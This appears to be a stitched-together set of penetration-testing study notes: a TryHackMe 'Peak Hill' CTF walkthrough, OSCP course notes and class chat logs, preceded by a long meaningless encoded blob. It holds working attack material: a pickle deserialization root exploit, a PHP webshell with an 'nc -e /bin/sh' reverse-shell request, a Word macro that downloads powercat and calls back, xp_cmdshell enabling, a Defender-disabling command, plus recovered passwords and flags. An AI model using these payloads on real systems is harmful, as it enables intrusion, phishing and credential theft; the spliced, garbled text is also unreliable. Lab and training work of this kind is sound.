MDAwMTAxMDAxMDAwMDExMDEwMDAwMTAwMDAwMTEwMDAwMTEwMDExMTAwMDEwMTAwMTAwMTAxMDExMDAwMDAwMDEwMDEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMTExMDAxMTAxMTEwMDExMDExMDEwMDAwMTAxMTExMTAxMTEwMDAwMDExMDAwMDEwMTExMDAxMTAxMTEwMDExMDAxMTEwMDAwMTExMDAwMTAxMDAxMDEwMDExMDEwMDAwMDAxMTExMDEwMDAwMTEwMDExMTAwMDEwMTAwMTAxMTAxMDExMDAwMDAwMDEwMTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMTExMDAxMTAxMTEwMDExMDExMDEwMDAwMTAxMTExMTAxMTEwMDAwMDExMDAwMDEwMTExMDAxMTAxMTEwMDExMDAxMTAwMDEwMDExMDExMTAxMTEwMDAxMDEwMDExMDAwMTEwMTAwMDAwMTAxMDAxMTAwMDAxMTAwMTExMDAwMTAxMDAxMTAxMDEwMTEwMDAwMDAwMTAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAxMTEwMDExMDExMTAwMTEwMTEwMTAwMDAxMDExMTExMDExMTAwMDAwMTEwMDAwMTAxMTEwMDExMDExMTAwMTEwMDExMDAxMDAwMTEwMTAwMDExMTAwMDEwMTAwMTExMDAxMTAxMDAwMDAxMTExMTAxMDAwMDExMDAxMTEwMDAxMDEwMDExMTEwMTAxMTAwMDAwMDAxMDAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDExMTAwMTEwMTExMDAxMTAxMTAxMDAwMDEwMTExMTEwMTExMDEwMTAxMTEwMDExMDExMDAxMDEwMTExMDAxMDAwMTEwMDExMDExMTAwMDEwMTAxMDAwMDAxMTAxMDAwMDAwMDEwMDAxMDAwMDExMDAxMTEwMDAxMDEwMTAwMDEwMTAxMTAwMDAwMDAxMDAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDExMTAwMTEwMTExMDAxMTAxMTAxMDAwMDEwMTExMTEwMTExMDEwMTAxMTEwMDExMDExMDAxMDEwMTExMDAxMDAwMTEwMTAwMDExMTAwMDEwMTAxMDAxMDAxMTAxMDAwMDAxMDExMDAxMDAwMDExMDAxMTEwMDAxMDEwMTAwMTEwMTAxMTAwMDAwMDAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDExMTAwMTEwMTExMDAxMTAxMTAxMDAwMDEwMTExMTEwMTExMDAwMDAxMTAwMDAxMDExMTAwMTEwMTExMDAxMTAwMTEwMDAxMDAxMTAwMDEwMTExMDAwMTAxMDEwMTAwMDExMDEwMDAwMDAwMTEwMTEwMDAwMTEwMDExMTAwMDEwMTAxMDEwMTAxMDExMDAwMDAwMDEwMDEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMTExMDAxMTAxMTEwMDExMDExMDEwMDAwMTAxMTExMTAxMTEwMDAwMDExMDAwMDEwMTExMDAxMTAxMTEwMDExMDAxMTAwMDAwMTExMDAwMTAxMDEwMTEwMDEwMTEwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAxMTEwMDAwMDExMTAwMDEwMTAxMDExMTEwMDAwMTEwMDExMTAwMDEwMTAxMTAwMDAxMDExMDAwMDAwMDEwMTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMTExMDAxMTAxMTEwMDExMDExMDEwMDAwMTAxMTExMTAxMTEwMDAwMDExMDAwMDEwMTExMDAxMTAxMTEwMDExMDAxMTAwMDEwMDExMDAwMDAxMTEwMDAxMDEwMTEwMDEwMTEwMTAwMDAwMDExMDAxMTAwMDAxMTAwMTExMDAwMTAxMDExMDEwMDExMDAxMDEwMDEwMTExMA>) ``` ..]q.(X ...ssh_pass15q.X....uq..q.X ...ssh_user1q.X....hq..q.X ...ssh_pass25q.X....rq..q X ...ssh_pass20q h..q.X ...ssh_pass7q.X...._q .q.X ...ssh_user0q.X....gq..q.X ...ssh_pass26q.X....lq..q.X ...ssh_pass5q.X....3q..q.X ...ssh_pass1q.X....1q..q.X ...ssh_pass22q.h .q.X [email protected] ...ssh_user2q X....eq!.q"X ...ssh_user5q#X....iq$.q%X ...ssh_pass18q&h .q'X ...ssh_pass27q(X....dq).q*X ...ssh_pass3q+X....kq,.q-X ...ssh_pass19q.X....tq/.q0X ...ssh_pass6q1X....sq2.q3X ...ssh_pass9q4h..q5X ...ssh_pass23q6X....wq7.q8X ...ssh_pass21q9h..q:X ...ssh_pass4q;h..q<X ...ssh_pass14q=X....0q>.q?X [email protected] ...ssh_pass2qCX....cqD.qEX ...ssh_pass13qFh..qGX ...ssh_pass16qHhA.qIX ...ssh_pass8qJh..qKX ...ssh_pass17qLh).qMX ...ssh_pass24qNh>.qOX ...ssh_user3qPh..qQX ...ssh_user4qRh,.qSX ...ssh_pass11qTh .qUX ...ssh_pass0qVX....pqW.qXX ...ssh_pass10qYh..qZe. ``` ``` kali@kali:~/CTFs/tryhackme/Peak Hill$ python3 decode_pickel.py SSH user: gherkin SSH pass: p1ckl3s_@11_@r0und_th3_w0rld ``` ``` gherkin@ubuntu-xenial:~$ ls -la total 16 drwxr-xr-x 3 gherkin gherkin 4096 Oct 8 15:24 . drwxr-xr-x 4 root root 4096 May 15 18:38 .. drwx------ 2 gherkin gherkin 4096 Oct 8 15:24 .cache -rw-r--r-- 1 root root 2350 May 15 18:37 cmd_service.pyc gherkin@ubuntu-xenial:~$ ``` ```py kali@kali:~/CTFs/tryhackme/Peak Hill$ uncompyle6 cmd_service.pyc # uncompyle6 version 3.7.4 # Python bytecode 3.8 (3413) # Decompiled from: Python 3.8.2 (default, Apr 1 2020, 15:52:55) # [GCC 9.3.0] # Embedded file name: ./cmd_service.py # Compiled at: 2020-05-14 19:55:16 # Size of source mod 2**32: 2140 bytes from Crypto.Util.number import bytes_to_long, long_to_bytes import sys, textwrap, socketserver, string, readline, threading from time import * import getpass, os, subprocess username = long_to_bytes(1684630636) password = long_to_bytes(2457564920124666544827225107428488864802762356) class Service(socketserver.BaseRequestHandler): def ask_creds(self): username_input = self.receive(b'Username: ').strip() password_input = self.receive(b'Password: ').strip() print(username_input, password_input) if username_input == username: if password_input == password: return True return False def handle(self): loggedin = self.ask_creds() if not loggedin: self.send(b'Wrong credentials!') return None self.send(b'Successfully logged in!') while True: command = self.receive(b'Cmd: ') p = subprocess.Popen(command, shell=True, stdout=(subprocess.PIPE), stderr=(subprocess.PIPE)) self.send(p.stdout.read()) def send(self, string, newline=True): if newline: string = string + b'\n' self.request.sendall(string) def receive(self, prompt=b'> '): self.send(prompt, newline=False) return self.request.recv(4096).strip() class ThreadedService(socketserver.ThreadingMixIn, socketserver.TCPServer, socketserver.DatagramRequestHandler): pass def main(): print('Starting server...') port = 7321 host = '0.0.0.0' service = Service server = ThreadedService((host, port), service) server.allow_reuse_address = True server_thread = threading.Thread(target=(server.serve_forever)) server_thread.daemon = True server_thread.start() print('Server started on ' + str(server.server_address) + '!') while True: sleep(10) if __name__ == '__main__': main() # okay decompiling cmd_service.pyc ``` ``` kali@kali:~/CTFs/tryhackme/Peak Hill$ python3 Python 3.8.2 (default, Apr 1 2020, 15:52:55) [GCC 9.3.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> from Crypto.Util.number import long_to_bytes >>> print(long_to_bytes(1684630636)) b'dill' >>> print(long_to_bytes(2457564920124666544827225107428488864802762356)) b'n3v3r_@_d1ll_m0m3nt' >>> ``` ``` kali@kali:~/CTFs/tryhackme/Peak Hill$ nc 10.10.13.125 7321 Username: dill Password: n3v3r_@_d1ll_m0m3nt Successfully logged in! Cmd: ls -la total 12 drwxr-xr-x 2 root root 4096 May 15 18:38 . drwxr-xr-x 15 root root 4096 May 15 18:38 .. -r-xr-x--- 1 dill dill 2141 May 15 18:38 .cmd_service.py Cmd: pwd /var/cmd Cmd: whoami dill Cmd: cd Cmd: pwd /var/cmd Cmd: cat /home/dill/user.txt f1e13335c47306e193212c98fc07b6a0 Cmd: echo "ssh-rsa XYZ= kali@kali" >> /home/dill/.ssh/authorized_keys ``` ``` kali@kali:~/CTFs/tryhackme/Peak Hill$ ssh [email protected] Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-177-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 28 packages can be updated. 19 updates are security updates. Last login: Wed May 20 21:56:05 2020 from 10.1.122.133 dill@ubuntu-xenial:~$ pwd /home/dill dill@ubuntu-xenial:~$ sudo -l Matching Defaults entries for dill on ubuntu-xenial: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User dill may run the following commands on ubuntu-xenial: (ALL : ALL) NOPASSWD: /opt/peak_hill_farm/peak_hill_farm dill@ubuntu-xenial:~$ ``` ``` dill@ubuntu-xenial:/opt/peak_hill_farm$ python3 Python 3.5.2 (default, Apr 16 2020, 17:47:17) [GCC 5.4.0 20160609] on linux Type "help", "copyright", "credits" or "license" for more information. >>> import os >>> import pickle >>> import base64 >>> class evil_object(object): def __reduce__(self... ): return (os.system, ('/bin/bash',))... ... >>> x = evil_object() >>> holdit = pickle.dumps(x) >>> base64.b64encode(holdit) b'gANjcG9zaXgKc3lzdGVtCnEAWAkAAAAvYmluL2Jhc2hxAYVxAlJxAy4=' >>> dill@ubuntu-xenial:/opt/peak_hill_farm$ sudo ./peak_hill_farm Peak Hill Farm 1.0 - Grow something on the Peak Hill Farm! to grow: gANjcG9zaXgKc3lzdGVtCnEAWAkAAAAvYmluL2Jhc2hxAYVxAlJxAy4= root@ubuntu-xenial:/opt/peak_hill_farm# ``` ``` root@ubuntu-xenial:/opt/peak_hill_farm# find /root/ -name "*root.txt*" -exec cat {} \; e88f0a01135c05cf0912cf4bc335ee28 ``` 1. What is the user flag? `f1e13335c47306e193212c98fc07b6a0` 2. What is the root flag? `e88f0a01135c05cf0912cf4bc335ee28`
ldap protocol, underlying protocol for AD 389 is a ldap port that would be open distinguished name for domain controller book.hactricks.xyz/network-services-pentesting/pentesting-ldap authentication required in case of accessing data ldap search for enumeration can run without user requirement https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap breif information about ldap protocol Domain admin /domain parameter RSAT - remote server administration tools https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-groups https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 bloodhound Set-MpPreference -DisableRealtimeMonitoring $true tickets https://tryhackme.com/room/enterprise from Kartikey Jain to everyone: 2:50 PM Try this AD machine. from Kartikey Jain to everyone: 2:55 PM https://tryhackme.com/room/breachingad from Kartikey Jain to everyone: 2:56 PM Subscribed THM Users can play this AD machines from Kartikey Jain to everyone: 2:56 PM https://tryhackme.com/room/adenumeration Machines and challenges for practice Resources: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection https://github.com/erev0s/VAmPI https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap https://www.hackingarticles.in/active-directory-enumeration-rpcclient/ https://github.com/igniterealtime/Spark/releases/download/v2.8.3/spark_2_8_3.deb Exploits https://www.exploit-db.com/exploits/48296 https://medium.com/@_crac/cve-2022-33891-apache-spark-shell-command-injection-vulnerability-7c76d0e53155 CTFs Easy https://ringzer0ctf.com/challenges https://tryhackme.com/room/bolt LFI == http://challenges.ringzer0team.com:10075/?page=lorem.php https://tryhackme.com/room/fileinc https://app.hackthebox.com/machines/Inject Command Injection == https://app.hackthebox.com/machines/Precious https://tryhackme.com/room/owaspapisecuritytop105w https://tryhackme.com/room/sudovulnssamedit https://tryhackme.com/room/hydra https://tryhackme.com/room/windows10privesc https://tryhackme.com/room/linuxprivesc https://tryhackme.com/room/linprivesc AD == Easy - https://tryhackme.com/room/attacktivedirectory https://tryhackme.com/room/breachingad https://tryhackme.com/room/k Medium - https://tryhackme.com/room/vulnnetactive https://app.hackthebox.com/machines/Escape Hard - https://tryhackme.com/room/enterprise SQLi/SQL exploitation == Easy https://app.hackthebox.com/machines/Stocker https://tryhackme.com/room/sqlilab Medium https://app.hackthebox.com/machines/Escape Current Machine ============================ https://tryhackme.com/room/overpass3hosting ============================ Getting familiar with Kali linux introduction to bash script understanding the target network -> domain (AD) -> subnet -> OS Information gathering -> port scanning -> service enum -> web app enumeration Intial access -> applicable vulnerabilities -> develop exploit Persistence Privilege escalation Lateral movement -> move from windows client to other windows machine like server or linux machine Web app attacks Password cracking metasploit Reporting Gpo through this topic https://medium.com/@_crac/cve-2022-33891-apache-spark-shell-command-injection-vulnerability-7c76d0e53155 nc -zv Ip Port /usr/share/windows-binaries -- windows specific resources. This document provides a step-by-step guide to obtaining a reverse shell on a target machine. It covers information gathering, service enumeration, and uploading a webshell or reverse shell using upload.php. The document includes a one-liner webshell and a sample HTTP request for uploading the reverse shell. reverse shell https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet Exercise 1 - Obtain reverse shell on target machine 1. Information gathering on target 192.168.5.59 --> port scan using nmap --> do a full port scan using nmap -sV -p- 192.168.5.59 --> Look for resulting open ports, you will see 8999 and 22 2. Service enumeration Port 22 is a standard port used for ssh port 8999 is a custom port. look for information about port 8999; you will get http service running on it. 3. Once service is known, you will need to gather information about the page through tools like gobuster, dirb, dirbuster to list standard pages/directory names. --Using a medium list, you will "upload.php" as one page. 4. Open upload.php which allows you to upload file. 5. use upload.php to upload webshell or reverse shell. One liner webshell below <?php echo "connected" ; system($_GET['h']);?> Request GET /uploads/crack.php?h=/usr/bin/nc+-e+/bin/sh+192.168.5.58+5555 HTTP/1.1 Host: 192.168.5.59:8999 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 CTFs and resources == https://picoctf.org/ https://www.hackthebox.com/ https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=721998175 DAY 2 https://github.com/3ndG4me/AutoBlue-MS17-010/blob/master/eternalblue_exploit10.py https://portswigger.net/web-security/xxe https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection#exploiting-xxe-to-retrieve-files Day 3 https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection https://github.com/erev0s/VAmPI https://ringzer0ctf.com/challenges Please use these challenges for javascript based attacks under "javascript" section https://tryhackme.com/room/bolt https://tryhackme.com/room/sqlilab this is the simple setup to understand LFI vulnerability - http://challenges.ringzer0team.com:10075/?page=lorem.php https://tryhackme.com/room/fileinc https://www.exploit-db.com/exploits/48296 3/30 https://app.hackthebox.com/machines/Inject https://app.hackthebox.com/machines/Precious https://tryhackme.com/room/owaspapisecuritytop105w 31 Mar https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver16 More info on xp_cmdshell() -- To allow advanced options to be changed. EXECUTE sp_configure 'show advanced options', 1; GO -- To update the currently configured value for advanced options. RECONFIGURE; GO -- To enable the feature. EXECUTE sp_configure 'xp_cmdshell', 1; GO -- To update the currently configured value for this feature. RECONFIGURE; GO These are the commands to enable xp_cmdshell() https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md Payloads for MSSQL Injection Install "HackBar, Payload Bucket" extension in Burpsuite Community version it will create SQL payloads for you. https://book.hacktricks.xyz/welcome/readme for almost all techniques, attack vectors, payloads ^ MACROS -- 1. Open “view macro” ms word 2. open kali web server to host this file https://github.com/besimorhino/powercat 3. create macro with below powershell command 4. IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell 4. Use below to creat chunked string str = "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAdwA..." n = 50 for i in range(0, len(str), n): print("Str = Str + " + '"' + str[i:i+n] + '"' 4. use following VB script to obtain connection on kali machine Sub AutoOpen() MyMacro End Sub Sub Document_Open() MyMacro End Sub Sub MyMacro() Dim Str As String Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU" CreateObject("Wscript.Shell").Run Str End Sub Leveraging library-ms file and shortcut files (.lnk) -- 2 staged payload Notes - 3/31 from AMIT to everyone: 9:36 AM yes ma'am from Swati to everyone: 9:48 AM /usr/share/doc/python3-impacket/examples from Akhil Vijayan to everyone: 10:10 AM mam. why dont we directly use offsec' AND sleep(3) ? from Swati to everyone: 10:13 AM https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet/ from Akhil Vijayan to everyone: 10:13 AM so there is no blind sql injection in this example mam?. from Akhil Vijayan to everyone: 10:14 AM if the condition turned to be false, then that means, sleep didnt execute right mam?. from Akhil Vijayan to everyone: 10:15 AM AND IF(1=1 is the condition right mam from Akhil Vijayan to everyone: 10:15 AM 1 = 1 is true. And for true you need to execute sleep function from Akhil Vijayan to everyone: 10:15 AM and post execution of sleep, the contents of offsec user details are also supposed to be printed right mam?. from Akhil Vijayan to everyone: 10:23 AM ok mam. so that means for first 3 seconds the results will be displayed and then post 3 seconds, once the entire query becomes false, the results disappears?? from Akhil Vijayan to everyone: 10:26 AM yes maam from Kartikey Jain to everyone: 10:29 AM https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver16 from Kartikey Jain to everyone: 10:29 AM More info on xp_cmdshell() from Kartikey Jain to everyone: 10:30 AM -- To allow advanced options to be changed. EXECUTE sp_configure 'show advanced options', 1; GO -- To update the currently configured value for advanced options. RECONFIGURE; GO -- To enable the feature. EXECUTE sp_configure 'xp_cmdshell', 1; GO -- To update the currently configured value for this feature. RECONFIGURE; GO from Kartikey Jain to everyone: 10:30 AM These are the commands to enable xp_cmdshell() from Kartikey Jain to everyone: 10:31 AM https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md from Kartikey Jain to everyone: 10:31 AM Payloads for MSSQL Injection from Kartikey Jain to everyone: 10:38 AM Install "HackBar, Payload Bucket" extension in Burpsuite Community version from Kartikey Jain to everyone: 10:38 AM it will create SQL payloads for you. from Swati to everyone: 10:41 AM https://book.hacktricks.xyz/welcome/readme from Swati to everyone: 10:42 AM for almost all techniques, attack vectors, payloads ^ from Swati to everyone: 10:55 AM sql, easy https://www.vulnhub.com/entry/sunset-midnight,517/ https://www.vulnhub.com/entry/tre-1,483/ sql medium https://www.vulnhub.com/entry/oz-1,317/ sql medium Querier htb from Swati to everyone: 10:56 AM https://www.vulnhub.com/entry/sunset-midnight,517/ from AK to everyone: 10:56 AM ok ma'am from Kartikey Jain to everyone: 11:06 AM https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide from apps to everyone: 11:51 AM still under download, request reset by vulnhub from Akhil Vijayan to everyone: 11:53 AM Mam, you can try checking wireshark packets to identify the IP address incase of any broadcast packets / dhcp requests are arising out of the vulnhub box. from AK to everyone: 12:17 PM DownloadString stores in memory, where as DownloadFile stores in filesystem? Right from AK to everyone: 12:29 PM Ma'am if you could share some link from where we can creat malicious macros, would be really helpful. from Swati to everyone: 12:31 PM https://www.hackingarticles.in/multiple-ways-to-exploit-windows-systems-using-macros/ from Swati to everyone: 12:32 PM https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office/inject-macros-from-a-remote-dotm-template-docx-with-macros from Swati to everyone: 12:33 PM https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/fileformat/office_word_macro.md from Kartikey Jain to everyone: 12:48 PM https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology/phishing-documents from Kartikey Jain to everyone: 12:48 PM Resource for Phishing Macro Docs from Swati to everyone: 12:57 PM lunch break till 2:15 and you can try the steps for macros and library files till that time. from Swati to everyone: 12:57 PM steps on https://codeshare.io/oscp2023 from Kartikey Jain to everyone: 12:59 PM https://github.com/samratashok/nishang from Kartikey Jain to everyone: 1:00 PM One of the best payloads in powershell for different types of bypasses from Kartikey Jain to everyone: 1:00 PM also contains rev shells too from AK to everyone: 2:01 PM Maam request if the links and info provided in the chat can also be shared in the sharecode link. from Swati to everyone: 2:11 PM yes we will cross-check if aything is missing there from apps to everyone: 2:37 PM how did you come to know what hashing algo is being used by this wordpress version? from apps to everyone: 2:37 PM why MD5? from Swati to everyone: 2:41 PM $P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/ from apps to everyone: 2:42 PM got it. Thank you. from apps to everyone: 2:42 PM Also, doesnt wp salt its hashes randomly based on the config the admin does trhough wp console? So hash identifier will totally depend on whether that hash was cracked sometime in the past or not, correct? from Akhil Vijayan to everyone: 2:43 PM the hash created by the tool for 123456 does not have $p$ mam. from Akhil Vijayan to everyone: 2:43 PM i think $P$ is kind of a particular format of hash from Akhil Vijayan to everyone: 2:44 PM can you create a new user and give a new password just to see the type of hashes created by the system? from Akhil Vijayan to everyone: 2:49 PM https://tryhackme.com/resources/blog/free_path from Akhil Vijayan to everyone: 2:49 PM Free stuffs of tryhackme. from Kartikey Jain to everyone: 3:07 PM After getting the reverse shell, use these command to stablize the shell from Kartikey Jain to everyone: 3:07 PM https://brain2life.hashnode.dev/how-to-stabilize-a-simple-reverse-shell-to-a-fully-interactive-terminal from Kartikey Jain to everyone: 3:11 PM https://hashes.com/en/decrypt/hash from Kartikey Jain to everyone: 3:12 PM https://crackstation.net/ from Kartikey Jain to everyone: 3:12 PM Some online hash crackers from Kartikey Jain to everyone: 3:17 PM https://github.com/carlospolop/PEASS-ng/releases/tag/20230326 from Akhil Vijayan to everyone: 3:19 PM mam run the script and save it as a txt file from Akhil Vijayan to everyone: 3:22 PM mam, copy the linpeas script, save it as a .sh file in the target machine. run the script and save the results to another txt file from Akhil Vijayan to everyone: 3:22 PM do an ssh to the target machine using jose and his password from Akhil Vijayan to everyone: 3:22 PM that will give you a better interactive shell from Akhil Vijayan to everyone: 3:25 PM mam both IPs are private and you can very well get an ssh from Akhil Vijayan to everyone: 3:25 PM in ssh terminal you will be able to use a proper interactive shell and then use more / less commands mam to go through the linpeas script results from Akhil Vijayan to everyone: 3:26 PM Always mam ! ;-) from Kartikey Jain to everyone: 3:39 PM https://www.thegeekdiary.com/what-is-suid-sgid-and-sticky-bit/ from Kartikey Jain to everyone: 3:39 PM What is SUID bit from Akhil Vijayan to everyone: 3:39 PM mam how did you change the service file? can you explain once again? from Akhil Vijayan to everyone: 3:45 PM But mam, are'nt we actually using ssh actively to communicate with the machine??. if so why this status command is not showing actual running ssh services or active connection?.. from Kartikey Jain to everyone: 3:48 PM https://tryhackme.com/room/vulnnetactive from Swati to everyone: 3:49 PM https://tryhackme.com/room/sudovulnssamedit from Kartikey Jain to everyone: 3:56 PM List of all SUID binaries and related attack vectors from Kartikey Jain to everyone: 3:56 PM https://gtfobins.github.io/ from Kartikey Jain to everyone: 4:22 PM VirtualAlloc() Win32 API Doc from Kartikey Jain to everyone: 4:22 PM https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc from Kartikey Jain to everyone: 4:25 PM https://antiscan.me/ from Kartikey Jain to everyone: 4:30 PM Powershell Execution Policies from Kartikey Jain to everyone: 4:30 PM https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.3 from Kartikey Jain to everyone: 4:31 PM Bypass ways from Kartikey Jain to everyone: 4:31 PM https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/ 4/3 from Akhil Vijayan to everyone: 9:53 AM but mam token for asp.net websites are big alphanumeric keys which is not possible to bruteforce from Swati to everyone: 9:59 AM https://tryhackme.com/room/hydra from Swati to everyone: 10:14 AM We will start in 5 mins from HomelandSecurity to everyone: 10:18 AM no audio from Swati to everyone: 10:34 AM https://hashcat.net/wiki/doku.php?id=rule_based_attack from Swati to everyone: 11:01 AM evil-winrm from Swati to everyone: 11:03 AM CrackMapExec ↩︎ from Swati to everyone: 11:31 AM https://tryhackme.com/room/windows10privesc from Akhil Vijayan to everyone: 11:40 AM mam, if NLA is turned on, does this work? from Akhil Vijayan to everyone: 12:08 PM mam u can try using certutil from Swati to everyone: 12:10 PM https://gist.github.com/S3cur3Th1sSh1t/d14c3a14517fd9fb7150f446312d93e0 from Swati to everyone: 12:10 PM https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 from Swati to everyone: 12:11 PM https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation from AMIT to everyone: 12:14 PM ma'am pls paste in clipboard of the box from Kartikey Jain to everyone: 12:47 PM if you all are following the machine path, then it may possible that exact msfvenom payload wont work, try to change the payload and then try again. from Kartikey Jain to everyone: 12:47 PM You can also use powershell reverse tcp payload too from Swati to everyone: 2:10 PM We will start in 5 mins from Kartikey Jain to everyone: 2:14 PM https://tryhackme.com/room/linuxprivesc from Kartikey Jain to everyone: 2:15 PM https://tryhackme.com/room/linprivesc from Kartikey Jain to everyone: 2:51 PM https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters from Kartikey Jain to everyone: 2:51 PM This link contains all the powershell commands used in privesc (including the secure-string conversion) from Swati to everyone: 3:11 PM starting again in another 5 mins from Kartikey Jain to everyone: 3:19 PM SysInternals Tools Suite from Kartikey Jain to everyone: 3:19 PM https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite from Kartikey Jain to everyone: 3:19 PM Keep these tools for privesc from Kartikey Jain to everyone: 4:10 PM PrintSpoofer Exploit from Kartikey Jain to everyone: 4:10 PM https://github.com/itm4n/PrintSpoofer from Akhil Vijayan to everyone: 4:14 PM mam can you do a walkthrough of an oscp lab? from Kartikey Jain to everyone: 4:16 PM Windows Privesc Attack Vectors from Kartikey Jain to everyone: 4:16 PM https://infosecwriteups.com/privilege-escalation-in-windows-380bee3a2842 https://tryhackme.com/room/windows10privesc 04/05 from Swati to everyone: 11:20 AM https://tryhackme.com/room/attacktivedirectory from Swati to everyone: 11:23 AM starting in 20-25 mins from Swati to everyone: 11:30 AM who all got oscp vouchers? from Akhil Vijayan to everyone: 11:36 AM Not yet received mam. from AMIT (privately): 11:40 AM Not yet received mam. from AMIT to everyone: 12:19 PM ma'am metaspolit can use one time only and sharphound is also part of metaspolit so can it cosindered for metasploit use. from AMIT to everyone: 12:19 PM thanks from rahul to everyone: 12:57 PM Set-MpPreference -DisableRealtimeMonitoring $true from Swati to everyone: 1:09 PM We will start in 1 hour, at 2:15 from Swati to everyone: 1:09 PM lunch break for now from Swati to everyone: 2:09 PM We will start in 5 mins from Kartikey Jain to everyone: 2:50 PM https://tryhackme.com/room/enterprise from Kartikey Jain to everyone: 2:50 PM Try this AD machine. from Kartikey Jain to everyone: 2:55 PM https://tryhackme.com/room/breachingad from Kartikey Jain to everyone: 2:56 PM Subscribed THM Users can play this AD machines from Kartikey Jain to everyone: 2:56 PM https://tryhackme.com/room/adenumeration from Kartikey Jain to everyone: 3:15 PM https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64 from Akhil Vijayan to everyone: 3:43 PM Mam, it's written in the instructions that there may be account lockouts in case if we try bruteforce from Akhil Vijayan to everyone: 4:02 PM Received tryhackme voucher for one month via email. Thank you. from Kartikey Jain to everyone: 4:03 PM https://github.com/urbanadventurer/username-anarchy from Kartikey Jain to everyone: 4:03 PM Use this tool to create combinations of firstname and lastname for username enumeration 4/6 m Swati to everyone: 9:34 AM https://app.hackthebox.com/machines/Inject from HomelandSecurity (privately): 9:38 AM mam , trying to reach on your number from HomelandSecurity (privately): 9:38 AM may i know im not able to view any screen currently from HomelandSecurity (privately): 9:39 AM and if yiu have listed what all machine on tryhackme have been given from apps to everyone: 9:40 AM yes from Akhil Vijayan to everyone: 9:40 AM yes from AMIT to everyone: 9:40 AM yes https://highon.coffee/blog/lfi-cheat-sheet/ from Akhil Vijayan to everyone: 11:10 AM mam can you show the error in browser again? from apps to everyone: 11:36 AM Can we not use MF since in actual exam it'll be allowed only once? from Akhil Vijayan to everyone: 11:42 AM mam, request if you can show a manual method, since metasploit usage is discouraged. from Akhil Vijayan to everyone: 11:50 AM I can find some post request formats which uses a function router method / service from Akhil Vijayan to everyone: 11:50 AM But i am unable to figure out how that is used to get a reverse shell from Akhil Vijayan to everyone: 11:50 AM request if you can explain the same for everyone's benefit. from Akhil Vijayan to everyone: 11:52 AM https://github.com/cckuailong/pocsploit/blob/master/modules/vulnerabilities/springcloud/springcloud-function-spel-rce.py from Akhil Vijayan to everyone: 1:05 PM post downloading, how do we execute the shell from the server mam? from Akhil Vijayan to everyone: 1:05 PM or is it a reverseshell made using msfvenom? from Akhil Vijayan to everyone: 1:07 PM elf? from Akhil Vijayan to everyone: 1:14 PM mam what if nc is not installed in the server? from Akhil Vijayan to everyone: 1:24 PM ok mam from Akhil Vijayan to everyone: 1:24 PM request if you can post the link of the one liner payload from Swati to everyone: 1:54 PM https://exploit-notes.hdks.org/exploit/web/framework/java/spring-cloud-function-rce/ from Swati to everyone: 2:04 PM https://app.hackthebox.com/machines/Precious from Swati to everyone: 2:04 PM next machine ^^ from Swati to everyone: 2:28 PM from Swati to everyone: 2:04 PM https://app.hackthebox.com/machines/Precious from rahul to everyone: 3:37 PM DocPhillovestoInject123 from 